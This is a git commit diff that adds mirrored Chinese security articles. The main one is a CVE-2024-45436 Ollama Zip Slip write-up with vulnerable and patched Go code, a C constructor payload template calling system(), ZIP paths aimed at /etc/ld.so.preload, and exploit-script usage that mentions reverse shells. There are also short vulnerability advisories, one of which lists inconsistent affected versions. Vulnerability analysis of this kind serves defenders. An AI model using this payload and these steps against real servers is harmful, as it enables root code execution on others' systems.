【DDDD二开】修复bug 新增指纹poc 新增功能、独家洞察｜Mallox勒索团伙疑似继续利用产品漏洞攻击投毒国内数百个资产、漏洞预警 | 用友U8Cloud任意文件读取漏洞、漏洞预警 | 智慧校园(安校易)管理系统SQL注入漏洞、EMQX命令执行后渗透、新手也能学会的安卓漏洞！手把手教你查出 App 数据泄露！、【高危漏洞预警】Wing FTP Server安全漏洞CVE-2025-5196、CVE-2024-45436:Ollama ZIP文件解压导致的命令执行漏洞、

2025-05-29 17:51:07 +00:00 · 2025-05-28 01:38:40 +00:00 · 2025-05-28 01:38:40 +00:00 · 57f31d52b7
commit 57f31d52b7
parent 00019fd56f
9 changed files with 930 additions and 4 deletions
--- a/data.json
+++ b/data.json
@ -14510,5 +14510,13 @@
    "https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247488502&idx=1&sn=c417e10a497251134c3d81775de5d501": "Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞 附POC",
    "https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651137007&idx=2&sn=1aaad1f68d3e1cc0bb3260721d30302c": "量子计算破解RSA加密难度降低20倍，后量子密码学迫在眉睫；国家网络安全通报中心提醒：ComfyUI存在多个高危漏洞 | 牛览",
    "https://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652115908&idx=2&sn=367490ce902e04506aa0eeed4a4df3ab": "办公平台存在安全漏洞！某国有企业违反《网络安全法》被处罚",
-    "https://mp.weixin.qq.com/s?__biz=MzkyNjczNzgzMA==&mid=2247484564&idx=1&sn=6fb78c41406e38426eb86081c19246cc": "漏洞挖掘—利用查询功能获取敏感信息（3）"
+    "https://mp.weixin.qq.com/s?__biz=MzkyNjczNzgzMA==&mid=2247484564&idx=1&sn=6fb78c41406e38426eb86081c19246cc": "漏洞挖掘—利用查询功能获取敏感信息（3）",
+    "https://mp.weixin.qq.com/s?__biz=Mzg2OTg5NjE5MQ==&mid=2247485290&idx=1&sn=54c83a4634320e1fdb80ed018b00c8c6": "【DDDD二开】修复bug 新增指纹poc 新增功能",
+    "https://mp.weixin.qq.com/s?__biz=MzkxNDY0MjMxNQ==&mid=2247535924&idx=1&sn=6fb1cc1ee15c4e163ede7fc4914209e6": "独家洞察｜Mallox勒索团伙疑似继续利用产品漏洞攻击投毒国内数百个资产",
+    "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247493239&idx=3&sn=e60c83d9ba5b3fa37d698e3f080ff9af": "漏洞预警 | 用友U8Cloud任意文件读取漏洞",
+    "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247493239&idx=2&sn=ea1367c3c4f9cfecdd1cd04ded2ceccb": "漏洞预警 | 智慧校园(安校易)管理系统SQL注入漏洞",
+    "https://mp.weixin.qq.com/s?__biz=MzAwMjQ2NTQ4Mg==&mid=2247499227&idx=1&sn=73bbfba76dd660bbc59316c7d3bfcd52": "EMQX命令执行后渗透",
+    "https://mp.weixin.qq.com/s?__biz=MzkxNjY5MDc4Ng==&mid=2247485063&idx=1&sn=4fd13821611ba0fa4db6c3c5dda51a33": "新手也能学会的安卓漏洞！手把手教你查出 App 数据泄露！",
+    "https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247490142&idx=1&sn=208226258cd185a7acfbdbfd55481e6d": "【高危漏洞预警】Wing FTP Server安全漏洞CVE-2025-5196",
+    "https://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247497264&idx=1&sn=a416851315173135e64299b51984541c": "CVE-2024-45436:Ollama ZIP文件解压导致的命令执行漏洞"
 }
--- a/ZIP文件解压导致的命令执行漏洞.md
+++ b/ZIP文件解压导致的命令执行漏洞.md
@ -0,0 +1,252 @@
+#  CVE-2024-45436:Ollama ZIP文件解压导致的命令执行漏洞   
+姓*户  七芒星实验室   2025-05-27 23:01  
+  
+**免责声明：**  
+由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！  
+  
+  
+文章作者：先知社区(  
+姓*户  
+)  
+  
+文章来源：  
+https://xz.aliyun.com/news/17826  
+  
+## 漏洞概述  
+  
+  
+CVE-2024-45436是一个在Ollama软件0.1.47版本之前存在的路径遍历漏洞（也称为"Zip Slip"漏洞）。该漏洞允许攻击者利用特制的ZIP文件，将文件解压到系统的任意位置，从而可以访问或覆盖系统文件，最终可能导致远程代码执行。**该漏洞仅限Linux系统**  
+  
+## 技术细节  
+  
+  
+漏洞位于Ollama的model.go  
+文件中的parseFromZipFile  
+函数，该函数负责处理ZIP文件的解压。问题在于此函数没有正确验证解压路径，当ZIP文件包含带有../  
+序列（目录遍历元素）的路径条目时，应用程序会将这些文件解压到目标目录以外的位置，而不是限制在指定的目标目录内。  
+  
+  
+攻击主要通过以下步骤：  
+  
+  
+1. 生成恶意共享对象文件（hook.so  
+），该文件包含可执行任意命令的代码  
+1. 将此文件打包到一个特制的ZIP文件中，包含指向系统关键位置的路径：  
+- ../../../../../../../../../../etc/ld.so.preload  
+ - 用于启用自定义共享对象的加载  
+  
+- ../../../../../../../../../../tmp/hook.so  
+ - 恶意共享对象本身  
+  
+3. 通过Ollama的blob API上传此ZIP文件到有漏洞的服务器  
+  
+4. 创建一个引用此blob的模型  
+  
+5. 通过请求embeddings触发有效载荷执行  
+  
+漏洞成因  
+  
+以下是ollama-0.1.46  
+源码中model.go的部分源代码  
+```
+func parseFromZipFile(_ context.Context, file *os.File, digest string, fn func(api.ProgressResponse)) (layers []*layerGGML, err error) {
+    stat, err := file.Stat()
+    if err != nil {
+        return nil, err
+    }
+
+    r, err := zip.NewReader(file, stat.Size())
+    if err != nil {
+        return nil, err
+    }
+
+    tempdir, err := os.MkdirTemp(filepath.Dir(file.Name()), "")
+    if err != nil {
+        return nil, err
+    }
+    defer os.RemoveAll(tempdir)
+```  
+  
+可以看到其中创建临时文件夹的代码tempdir, err := os.MkdirTemp(filepath.Dir(file.Name()), "")  
+  
+而由于zip文件的格式中，zip内的文件名称是写在文件头部分的，也就是说，可以构造恶意的文件名../../../../../../etc/xxx  
+，使得解压后的文件位于特定目录下。  
+于是，我们可以生成恶意的动态链接库，然后修改zip文件头的文件名为带../../../  
+前缀的文件名，就可以将恶意链接库解压到任意目录了  
+  
+  
+对比ollama-0.1.47  
+中对应的源码  
+```
+func parseFromZipFile(_ context.Context, file *os.File, digest string, fn func(api.ProgressResponse)) (layers []*layerGGML, err error) {
+    tempDir, err := os.MkdirTemp(filepath.Dir(file.Name()), "")
+    if err != nil {
+        return nil, err
+    }
+    defer os.RemoveAll(tempDir)
+    if err := extractFromZipFile(tempDir, file, fn); err != nil {
+        return nil, err
+    }
+......
+func extractFromZipFile(p string, file *os.File, fn func(api.ProgressResponse)) error {
+    stat, err := file.Stat()
+    if err != nil {
+        return err
+    }
+    r, err := zip.NewReader(file, stat.Size())
+    if err != nil {
+        return err
+    }
+    fn(api.ProgressResponse{Status: "unpacking model metadata"})
+    for _, f := range r.File {
+        n := filepath.Join(p, f.Name)
+        if !strings.HasPrefix(n, p) {
+            slog.Warn("skipped extracting file outside of context", "name", f.Name)
+            continue
+        }
+```  
+  
+可以看到新版本的代码在处理文件名称时增加了对文件名称前缀的检查，以此修复旧版本目录穿越的漏洞  
+  
+有关更多信息，可以查看github上两个版本之间的差异：  
+Comparing v0.1.46...v0.1.47 · ollama/ollama  
+  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicnB4xcxUfqvUpS6Fa7CPlW350leVHUvbPgg2oGmxl4nNnl5BicKJkI4csr39Bn84XxN6WdibFDG8ia8w/640?wx_fmt=png&from=appmsg "")  
+## 漏洞利用详解  
+  
+### 1. 恶意共享对象生成  
+  
+  
+攻击者首先创建一个恶意的C语言共享对象，该对象在构造函数中通过system()  
+函数执行任意命令：  
+```
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+void __attribute__((constructor)) myInitFunction() {
+    const char *f1 = "/etc/ld.so.preload";
+    const char *f2 = "/tmp/hook.so";
+    unlink(f1);
+    unlink(f2);
+    system("bash -c '%s'");
+}
+```  
+  
+这段代码中的%s  
+会被替换为攻击者指定的命令。  
+  
+### 2. ZIP Slip攻击  
+  
+  
+攻击者打包一个恶意ZIP文件，其中包含指向系统关键文件的路径：  
+  
+  
+- /etc/ld.so.preload  
+：Linux系统中的一个特殊文件，可用于在程序执行前预加载共享库  
+  
+- /tmp/hook.so  
+：恶意共享对象  
+  
+### 3. 攻击影响  
+  
+  
+通过以上步骤，攻击者可以：  
+  
+  
+1. 向Ollama的API端点/api/blobs/{blob_id}  
+提交恶意ZIP文件  
+1. 使文件写入到预期目录之外  
+1. 特别是写入到  
+/etc/ld.so.preload  
+以加载恶意共享对象  
+  
+以Ollama服务的权限（可能是root权限）执行任意代码  
+  
+  
+  
+此漏洞的影响包括：  
+  
+  
+- 远程代码执行（RCE）  
+- 未授权的系统访问  
+- 数据破坏或窃取  
+- 完全的系统控制权  
+## 复现过程  
+  
+  
+首先开一个docker环境  
+  
+```
+docker run -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.46
+```  
+  
+然后运行poc脚本：  
+srcx404/CVE-2024-45436: exploit script for CVE-2024-45436  
+```
+python exp.py <target_url> <command>
+```  
+  
+该脚本会通过传入的命令先构造C代码，然后编译生成动态链接库，再通过代码生成zip文件，最后通过api/upload/  
+接口提交到ollama。提交之后ollama就会将动态链接库解压到指定文件夹，然后通过api/embeddings  
+接口触发动态链接库的运行，执行先前传入的命令。  
+需要注意的是，该漏洞的命令执行并没有回显的方式，所以常规打法还是反弹shell  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicnB4xcxUfqvUpS6Fa7CPlW3dPBicse6iayP5htyDbjLV9Gt3WB5EhfricwHxibQ7cibicoh2ODKHvNpYsRg/640?wx_fmt=png&from=appmsg "")  
+## 受影响系统  
+  
+  
+该漏洞影响：  
+  
+  
+- Ollama版本0.1.46及更早版本  
+- 自托管和云部署的Ollama实例  
+- 仅支持Linux系统  
+## 漏洞检测  
+  
+  
+漏洞检测可通过调用Ollama的API版本端点来确定版本号：  
+GET /api/version  
+如果版本低于0.1.47，则系统可能存在此漏洞。  
+  
+## 缓解措施  
+  
+  
+推荐的缓解措施包括：  
+  
+  
+1. 将Ollama升级到版本0.1.47或更高版本  
+1. 如果无法立即升级，限制对Ollama API端点的网络访问  
+## 漏洞修复  
+  
+  
+Ollama官方在0.1.47版本中修复了这个问题，修复方案是在解压ZIP文件时，正确验证文件路径，防止路径穿越攻击。防止路径中包含../  
+或类似序列导致文件被解压到预期目录外部。  
+  
+  
+利用脚本  
+  
+  
+https://github.com/srcx404/CVE-2024-45436  
+  
+  
+**推 荐 阅 读**  
+  
+      
+  
+  
+  
+[](https://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247491634&idx=1&sn=a1873ac267a553dbe39d9b8eae72c5d1&scene=21#wechat_redirect)  
+  
+[](https://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247493905&idx=2&sn=32dabb1937bb95a440a7e79d05519a44&scene=21#wechat_redirect)  
+  
+[](https://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247492829&idx=2&sn=8b06dc14b5843d622465cb26c6ddbbe5&scene=21#wechat_redirect)  
+  
+[](http://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247491787&idx=2&sn=509e2b46d9144323fc9d13a1567296c3&chksm=cf611bc3f81692d5579b8a9128ff711eea3f7660b1ccd884e0be264e895fbfcb4c995c609be8&scene=21#wechat_redirect)  
+  
+[](http://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247491804&idx=2&sn=eb334c8bb0be9ea0a3baf21db6e8fd07&chksm=cf611bd4f81692c2e80f7855552fdb63b52b89c8b4fbfd50fabbf7cf478aff60c23ff0c22d8c&scene=21#wechat_redirect)  
+  
+  
+横向移动之RDP&Desktop Session Hija  
+  
+  
--- a/doc/2025-05/EMQX命令执行后渗透.md
+++ b/doc/2025-05/EMQX命令执行后渗透.md
@ -1,5 +1,5 @@
 #  EMQX命令执行后渗透   
-原创 yudays  yudays实验室   2025-05-07 23:59  
+ Khan安全团队   2025-05-28 00:32  
  
 欢迎转发，请勿抄袭  
  
@ -107,8 +107,6 @@ mqtt数据流
  
  
  
-  
-  
  
  
  
--- a/doc/2025-05/【DDDD二开】修复bug
+++ b/doc/2025-05/【DDDD二开】修复bug
--- a/doc/2025-05/【高危漏洞预警】Wing
+++ b/doc/2025-05/【高危漏洞预警】Wing
@ -0,0 +1,25 @@
+#  【高危漏洞预警】Wing FTP Server安全漏洞CVE-2025-5196   
+cexlife  飓风网络安全   2025-05-27 10:52  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu01EV80twSLgfl9M33TqNanYyMPRicV7Lg7WQ2icGe35BSJNSPxHGdsaicn23EEG4lS8Z27Q6Ub1bT6qQ/640?wx_fmt=png&from=appmsg "")  
+  
+漏洞描述:  
+  
+在Wing FTP Server直到7.4.3中已发现分类为致命的漏洞,受此漏洞影响的是未知功能的组件Lua Admin Console,该作会导致使用不必要的权限执行。攻击可以远程发起,攻击的复杂性相当高,开发似乎很困难,升级到版本7.4.4可以解决此问题,建议升级受影响的组件。  
+  
+受影响产品或系统:  
+  
+Wing FTP Server <= 4.0  
+  
+修复方案  
+  
+官方已经发布修改版本,请用户及时更新。  
+  
+补丁信息  
+  
+补丁名称:Wing FTP Server  
+  
+补丁链接:  
+  
+https://www.wftpserver.com/serverhistory.htm  
+  
--- a/doc/2025-05/新手也能学会的安卓漏洞！手把手教你查出
+++ b/doc/2025-05/新手也能学会的安卓漏洞！手把手教你查出
--- a/doc/2025-05/漏洞预警智慧校园(安校易)管理系统SQL注入漏洞.md
+++ b/doc/2025-05/漏洞预警智慧校园(安校易)管理系统SQL注入漏洞.md
@ -0,0 +1,41 @@
+#  漏洞预警 | 智慧校园(安校易)管理系统SQL注入漏洞   
+浅安  浅安安全   2025-05-28 00:00  
+  
+**0x00 漏洞编号**  
+- # 暂无  
+  
+**0x01 危险等级**  
+- 高危  
+  
+**0x02 漏洞概述**  
+  
+“安校易"是银达云创公司基于多年教育市场信息化建设经验沉淀，经过充分的客户需求调研，并依据国家"十三五"教育信息化建设规范而推出的综合互联网+教育信息化解决方案。  
+  
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SU4fzyXow7sKwcNrgrta4pab6CiaRedyu2TB39FNwl2jOsr3KUjfI9M88PxXIQ6djppiaRHyWiahgOyA/640?wx_fmt=png&from=appmsg "")  
+  
+**0x03 漏洞详情**  
+###   
+  
+**漏洞类型：**  
+SQL注入  
+  
+**影响：**  
+窃取敏感信息  
+  
+**简述：**  
+智慧校园(安校易)管理系统的/Module/CJGL/Controller/PPlugList.ashx接口处存在SQL注入漏洞，未经身份验证的攻击者可以通过该漏洞获取数据库敏感信息。  
+  
+**0x04 影响版本**  
+- 智慧校园(安校易)  
+  
+**0x05****POC状态**  
+- 已公开  
+  
+**0x06****修复建议**  
+  
+**目前官方已发布漏洞修复版本，建议用户升级到安全版本****：**  
+  
+http://www.winstaryc.com/  
+  
+  
+  
--- a/doc/2025-05/漏洞预警用友U8Cloud任意文件读取漏洞.md
+++ b/doc/2025-05/漏洞预警用友U8Cloud任意文件读取漏洞.md
@ -0,0 +1,41 @@
+#  漏洞预警 | 用友U8Cloud任意文件读取漏洞   
+浅安  浅安安全   2025-05-28 00:00  
+  
+**0x00 漏洞编号**  
+- # 暂无  
+  
+**0x01 危险等级**  
+- 高危  
+  
+**0x02 漏洞概述**  
+  
+用友U8Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。  
+  
+![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SXoaRemR3mxsuiciaUbPcWn9jsiaZ70u94EB6R9eOgsPln1PWpP3MSljJmZEwZYep2iakwjxN7DsbXlfg/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")  
+  
+**0x03 漏洞详情**  
+  
+**漏洞类型：**  
+任意文件读取  
+  
+**影响：**  
+获取敏感信息  
+  
+**简述：**  
+用友U8Cloud的/service/FileManageServlet接口存在任意文件读取漏洞，未经身份验证的攻击者可以通过该漏洞读取服务器任意文件，从而获取大量敏感信息。  
+  
+**0x04 影响版本**  
+- 用友U8Cloud  
+  
+**0x05****POC状态**  
+- 已公开  
+  
+****  
+**0x06****修复建议**  
+  
+**目前官方已发布漏洞修复版本，建议用户升级到安全版本****：**  
+  
+https://www.yonyou.com/  
+  
+  
+  
--- a/doc/2025-05/独家洞察｜Mallox勒索团伙疑似继续利用产品漏洞攻击投毒国内数百个资产.md
+++ b/doc/2025-05/独家洞察｜Mallox勒索团伙疑似继续利用产品漏洞攻击投毒国内数百个资产.md